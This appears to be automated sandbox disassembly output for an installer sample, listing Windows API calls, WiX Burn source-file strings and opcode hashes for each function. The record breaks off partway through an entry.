                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                            • API String ID: 2976181284-417918914
                                                            • Opcode ID: 2ae2bae8b79b68512326635ab399776df4cc51e8dfb5c851fed2ad182073ea71
                                                            • Instruction ID: c2761e6fd77bcfd25018bb20f7ceccbda72640170360c0f62344f7694ab37824
                                                            • Opcode Fuzzy Hash: 2ae2bae8b79b68512326635ab399776df4cc51e8dfb5c851fed2ad182073ea71
                                                            • Instruction Fuzzy Hash: AB316F72A4062AAFCF15EE98D885EAEB7B5FB04728B188215F924D7651D330ED108FD1
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?), ref: 00874123
                                                            • GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 00874131
                                                            • CreateDirectoryW.KERNEL32(?,840F01E8,00875489,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000), ref: 0087419A
                                                            • GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 008741A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: dirutil.cpp
                                                            • API String ID: 1375471231-2193988115
                                                            • Opcode ID: bde721a1a2d5f0cdc8c798dd5364c71277c0157fa6c4de1a9e3cec3b12809abe
                                                            • Instruction ID: b3a817e10b813f4e8b1cf82d266560dd3a3abf71f50f4c14163b26b7491448de
                                                            • Opcode Fuzzy Hash: bde721a1a2d5f0cdc8c798dd5364c71277c0157fa6c4de1a9e3cec3b12809abe
                                                            • Instruction Fuzzy Hash: A711022660433596D7313AA94C40B3BB664FF75B61F91E121FD0CEA248E3A0CC8196B2
                                                            APIs
                                                            • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00876595,00876595,?,0087563D,?,?,00000000), ref: 008756E5
                                                            • GetLastError.KERNEL32(?,0087563D,?,?,00000000,?,?,00876595,?,00877F02,?,?,?,?,?), ref: 00875714
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareErrorLastString
                                                            • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                            • API String ID: 1733990998-4228644734
                                                            • Opcode ID: 8e9df564d8b213e13e8b0baa499183a3a91ed320d1429c17535e74a78962d5b7
                                                            • Instruction ID: ce37c8e38c03a5e0eef78fe0437555df1765c0c3b312d267d10c553e0d57377f
                                                            • Opcode Fuzzy Hash: 8e9df564d8b213e13e8b0baa499183a3a91ed320d1429c17535e74a78962d5b7
                                                            • Instruction Fuzzy Hash: 4321D736640915EFC7188F98CD45A59BBA4FB457A0B254315E92CEB394E6B0ED018690
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008B0A38
                                                            • GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A46
                                                            • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 008B0A8B
                                                            • GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                            • String ID: procutil.cpp
                                                            • API String ID: 590199018-1178289305
                                                            • Opcode ID: 72e4ccceb2186ea347d1457ba538003caa8b71a0f685d4b6d4e4a9cca67c9634
                                                            • Instruction ID: 3f63c049f6dd7e008ebfd4b7818fac772d2b5bdd912da1dde51ec1f432b302c9
                                                            • Opcode Fuzzy Hash: 72e4ccceb2186ea347d1457ba538003caa8b71a0f685d4b6d4e4a9cca67c9634
                                                            • Instruction Fuzzy Hash: AA117C37D4573AABCB209B949D08AEFBBA4FB04760F124665ED54EB380E2748D009AD1
                                                            APIs
                                                              • Part of subcall function 0089140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00890A19,?,?,?), ref: 00891434
                                                              • Part of subcall function 0089140C: GetLastError.KERNEL32(?,00890A19,?,?,?), ref: 0089143E
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00890A27
                                                            • GetLastError.KERNEL32 ref: 00890A31
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00890A55
                                                            • Failed to read during cabinet extraction., xrefs: 00890A5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$PointerRead
                                                            • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                            • API String ID: 2170121939-2426083571
                                                            • Opcode ID: 0e6337b118a24dc79e4ec45096cc979eeb8f900e6c3a48e9644eec78a57be4ff
                                                            • Instruction ID: 15d7d5aadaf65d52588021aadeb0085692c83b16c9d71f0bcf86bed2a95b9c62
                                                            • Opcode Fuzzy Hash: 0e6337b118a24dc79e4ec45096cc979eeb8f900e6c3a48e9644eec78a57be4ff
                                                            • Instruction Fuzzy Hash: 76118E36A4123ABFCB21AF99DC08E9A7BB8FB08760B154255FD14E7251D730D9109AD1
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00890A19,?,?,?), ref: 00891434
                                                            • GetLastError.KERNEL32(?,00890A19,?,?,?), ref: 0089143E
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00891462
                                                            • Failed to move to virtual file pointer., xrefs: 0089146C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                            • API String ID: 2976181284-3005670968
                                                            • Opcode ID: 8dc440a8f171516563e53b9a1e8f9d6adcfcf8e1ea9c46650d1f918421c09cc1
                                                            • Instruction ID: 34f6bcc577ca14e2cbbc1f2ffcb6774a2ff09121093083cf6558bb2d84aa6a8e
                                                            • Opcode Fuzzy Hash: 8dc440a8f171516563e53b9a1e8f9d6adcfcf8e1ea9c46650d1f918421c09cc1
                                                            • Instruction Fuzzy Hash: D601B13294462A7B8F216A958C08A8BBB25FF047707158125FD28D6210D735D810C6D5
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008B3F73
                                                            • GetLastError.KERNEL32 ref: 008B3FD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1948546556-2967768451
                                                            • Opcode ID: 640996945dbb4abcd8de34e2d582db641003b694e52748ba6390e48054bbc40e
                                                            • Instruction ID: 3a104c248e26fd8ae43edf2b927ef1b37ceac560cc5047c1b8e94a9cad0b6c46
                                                            • Opcode Fuzzy Hash: 640996945dbb4abcd8de34e2d582db641003b694e52748ba6390e48054bbc40e
                                                            • Instruction Fuzzy Hash: DE316D71E00269ABDB21DE58CC40BEAB7B4FB04751F0041AAFA48E7340DBB49EC48A95
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,008B3F9A,?,?,?), ref: 008B4E5E
                                                            • GetLastError.KERNEL32(?,?,008B3F9A,?,?,?), ref: 008B4E68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 442123175-2967768451
                                                            • Opcode ID: 4bf00c86813fe1d1976f74ade034fe8cd9197681945a64ce0c0e940a60a3ba08
                                                            • Instruction ID: 2e1bff82c21ffdc111c32afaad1f237be64742f28c2ab1682bf6ab3267aa2573
                                                            • Opcode Fuzzy Hash: 4bf00c86813fe1d1976f74ade034fe8cd9197681945a64ce0c0e940a60a3ba08
                                                            • Instruction Fuzzy Hash: 55F04B33A00229BBC7209A9A8C46AEFBB6DFB44761F510225FD04E7241E770EA0086E1
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B4925
                                                            • GetLastError.KERNEL32(?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B492F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 2976181284-2967768451
                                                            • Opcode ID: 38db07a456eba99fb36e57ff821f434b3715cc5b34fcfdff1a3ddb87fde5e713
                                                            • Instruction ID: 5ab4d9fbb614ae93f14ab11e185ca3d3626ace8ea0fc471c14bda51fad8c3e44
                                                            • Opcode Fuzzy Hash: 38db07a456eba99fb36e57ff821f434b3715cc5b34fcfdff1a3ddb87fde5e713
                                                            • Instruction Fuzzy Hash: ADF08176A0012EAB9B208F85DC069AB7FA8FF04760B014155BD54EB321E731DC10D7E1
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00873877
                                                            • GetLastError.KERNEL32 ref: 00873881
                                                            • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 008738EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1230559179-0
                                                            • Opcode ID: 594d9a72d8d0dfd909b2cb4c48822d5751c83ba17942453d56bb153f820acedc
                                                            • Instruction ID: e0ea7203f71a4f355a916848a34a127d113b33a339950ec8a62a4ae720840989
                                                            • Opcode Fuzzy Hash: 594d9a72d8d0dfd909b2cb4c48822d5751c83ba17942453d56bb153f820acedc
                                                            • Instruction Fuzzy Hash: 1A21F8B2D0173EA7DB20DB648C45F9A7B68FB00710F1142B1BE18E7245DA70DE409BD2
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8), ref: 00873A20
                                                            • RtlFreeHeap.NTDLL(00000000,?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100), ref: 00873A27
                                                            • GetLastError.KERNEL32(?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100,?), ref: 00873A31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ErrorFreeLastProcess
                                                            • String ID:
                                                            • API String ID: 406640338-0
                                                            • Opcode ID: e7ae23c9d87ba34429570a3bcaa075c4bc6a83eb2db94f4ad5b0b1648e5a1f65
                                                            • Instruction ID: 4c4a4af6373b02eaa1cbbdc2b3961495643abfecd4b73734bf55ee98a89e1821
                                                            • Opcode Fuzzy Hash: e7ae23c9d87ba34429570a3bcaa075c4bc6a83eb2db94f4ad5b0b1648e5a1f65
                                                            • Instruction Fuzzy Hash: EBD0C273A0053957832117EE5C4D95BBF5CFF00AA17014220FD48D7220D721CC0092E1
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: regutil.cpp
                                                            • API String ID: 71445658-955085611
                                                            • Opcode ID: f7c3c908c8f00f5fe0aa277ccf498b30330f9454b21f44af121fdbaaf9eb3d9a
                                                            • Instruction ID: d94ae3a24e5044d12226f421065e0217f19acb2ac3a576cb7803e92d40f835d2
                                                            • Opcode Fuzzy Hash: f7c3c908c8f00f5fe0aa277ccf498b30330f9454b21f44af121fdbaaf9eb3d9a
                                                            • Instruction Fuzzy Hash: B7F0F633701136669B3005968C05BFBAA59FB947B0B194126BD4AEA3D0EE31CC109EF1
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 58873d1c957c6a4a721b7fea24cd90c76c1c930616dd5bef55b806fb4aab8b2e
                                                            • Instruction ID: 0909090ca1ebb33b4b26dac8daba9813af23b0b013c6a3570294b6bdf2e9208c
                                                            • Opcode Fuzzy Hash: 58873d1c957c6a4a721b7fea24cd90c76c1c930616dd5bef55b806fb4aab8b2e
                                                            • Instruction Fuzzy Hash: 41B012A127A401BD328851981D13C3B070CF1CAF61731436FF2A0C1382E8840C054037
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 6420366aa316e3fb8e4bacac90f9c6031b0da17c12bd5f64c065ce2eb5be49b7
                                                            • Instruction ID: f6e03d114cd285ba7267d2618277d76576a273e0b0f16fd80a42c38634a5f912
                                                            • Opcode Fuzzy Hash: 6420366aa316e3fb8e4bacac90f9c6031b0da17c12bd5f64c065ce2eb5be49b7
                                                            • Instruction Fuzzy Hash: 25B012A127A501BC328851981C12C3B070CF1CAF61731836FF2A0C1382E8800C444037
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 67d36eb8d7332b542a7cff1eef7f5266ce7cce6fbb0b5da68ad63173e0dbaddf
                                                            • Instruction ID: 0c5dca1968f087433bfef8af52bf6fd9cc578d088ba6c1cadf65a22cc2d77540
                                                            • Opcode Fuzzy Hash: 67d36eb8d7332b542a7cff1eef7f5266ce7cce6fbb0b5da68ad63173e0dbaddf
                                                            • Instruction Fuzzy Hash: D2B012A527A401BC324811941C12C3B070CF1C6F61731C36FF6A0C0382A8800C054077
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 008B35F8
                                                              • Part of subcall function 008B304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008B3609,00000000,?,00000000), ref: 008B3069
                                                              • Part of subcall function 008B304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0089C025,?,00875405,?,00000000,?), ref: 008B3075
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                            • String ID:
                                                            • API String ID: 52713655-0
                                                            • Opcode ID: 9d4c83017fdd9e1e06437aa4a91f91f95c6610c085df9366abcb0c465c4e46a4
                                                            • Instruction ID: a44861479e3cfec126e6c4c3e8de54de293d1021a6e259a26e33ea74da9022a3
                                                            • Opcode Fuzzy Hash: 9d4c83017fdd9e1e06437aa4a91f91f95c6610c085df9366abcb0c465c4e46a4
                                                            • Instruction Fuzzy Hash: DF312D76E01629AFCB11DFA8C884ADEB7F8FF09710F01456AED15EB311D6759D008BA4
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(80070490,00000000,80070490,008DAAA0,00000000,80070490,?,?,00888B19,WiX\Burn,PackageCache,00000000,008DAAA0,00000000,00000000,80070490), ref: 008B58CA
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID:
                                                            • API String ID: 1979452859-0
                                                            • Opcode ID: 957f04aecb6d2aec60e8ab5a25420ceb45b62daee655640c4d0b2204e9558aeb
                                                            • Instruction ID: 32c7972c63274d0f33eddac32730523c5adbaf666985e842e6df28d84c28356f
                                                            • Opcode Fuzzy Hash: 957f04aecb6d2aec60e8ab5a25420ceb45b62daee655640c4d0b2204e9558aeb
                                                            • Instruction Fuzzy Hash: A1117036900A6AEF8B21AE988945AEFBB68FF04320B154179ED41A7311C7324E50D6D1
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008A6213,00000001,00000364), ref: 008A5346
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1a0722c8d5d0abb82b030d93bf44fb7ab266e79791077c9d0010a2692c1f0512
                                                            • Instruction ID: 473770bc7ffa2f549abdde3e2a92f5fdf624ecc3ebe79a23ed68a4fac0bcafe0
